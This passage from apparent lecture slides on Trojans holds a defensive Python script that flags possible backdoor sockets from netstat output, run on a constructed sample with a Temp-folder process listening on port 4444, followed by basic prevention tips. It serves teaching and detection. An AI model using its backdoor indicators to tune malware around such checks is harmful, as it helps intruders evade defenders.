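            conns.append(Conn(m["proto"], m["laddr"], int(m["lport"]), m["raddr"],
                              m["rport"], m["state"] or "", int(m["pid"])))
    return conns


def find_backdoor_candidates(conns, processes):
    """processes maps PID -> image path. Returns [(conn, reason)] for suspicious sockets."""
    findings = []
    for c in conns:
        image = processes.get(c.pid, "<unknown>").lower()
        from_user_dir = any(d in image for d in USER_WRITABLE)
        reasons = []
        if c.state == "LISTENING" and from_user_dir:
            reasons.append("listening socket owned by a process in a user-writable directory")
        if c.state == "ESTABLISHED" and c.raddr not in ("127.0.0.1", "::1") and from_user_dir:
            reasons.append("outbound connection from a process in a user-writable directory")
        if c.state == "LISTENING" and c.lport in KNOWN_BACKDOOR_PORTS:
            reasons.append(f"listening on port {c.lport}, historically used by backdoors")
        if reasons:
            findings.append((c, "; ".join(reasons)))
    return findings


# Constructed sample output and process table (not from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       5120
  TCP    10.0.0.7:49712         203.0.113.8:443        ESTABLISHED     5120
  TCP    10.0.0.7:49801         198.51.100.20:443      ESTABLISHED     3300
  UDP    0.0.0.0:500            *:*                                    1100
"""
SAMPLE_PROCESSES = {
    912: "C:\\Windows\\System32\\svchost.exe",
    1100: "C:\\Windows\\System32\\svchost.exe",
    3300: "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
    5120: "C:\\Users\\alice\\AppData\\Local\\Temp\\photo_viewer.exe",
}

if __name__ == "__main__":
    for conn, reason in find_backdoor_candidates(parse_netstat(SAMPLE_NETSTAT), SAMPLE_PROCESSES):
        print(f"PID {conn.pid} {conn.proto} {conn.laddr}:{conn.lport} -> "
              f"{conn.raddr}:{conn.rport} {conn.state}: {reason}")
```

On a real system `netstat -ano` and `tasklist` (or `Get-Process` in PowerShell) supply the two inputs. A process image under AppData or Temp is not proof of malice, but it is where a Trojan delivered by email attachment or drive-by download most often lands, and a listener there deserves a look.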
39
EXAMPLE OF TROJAN
HOW TO PREVENT TROJAN? 40

Preventing Trojan infections involves a combination of proactive measures, security best
practices, and user education. Trojans are deceptive malware that masquerade as legitimate
software or files while carrying out malicious activities in the background. Here are some ways
to prevent Trojan infections:

1.Use Reputable Antivirus Software: Install reputable antivirus or anti-malware software on your
devices and keep it updated. Antivirus programs can detect and remove Trojans before they cause
harm.
2.Keep Your System Updated: Regularly update your operating system and software applications and
apply security patches. Updates often include fixes for security vulnerabilities that could be
exploited by exploit Trojans.
3.Exercise Caution with Email Attachments: Be wary of email attachments, especially from unknown
or suspicious senders. Do not open attachments unless you are expecting them and can verify the
sender's authenticity. Consider using email filtering solutions to block suspicious attachments.
4.Be Cautious of Suspicious Links: Avoid clicking on links in emails, instant messages, or social
media messages from unknown or untrustworthy sources. These links could lead to malicious
websites that distribute Trojans.

THANK YOU
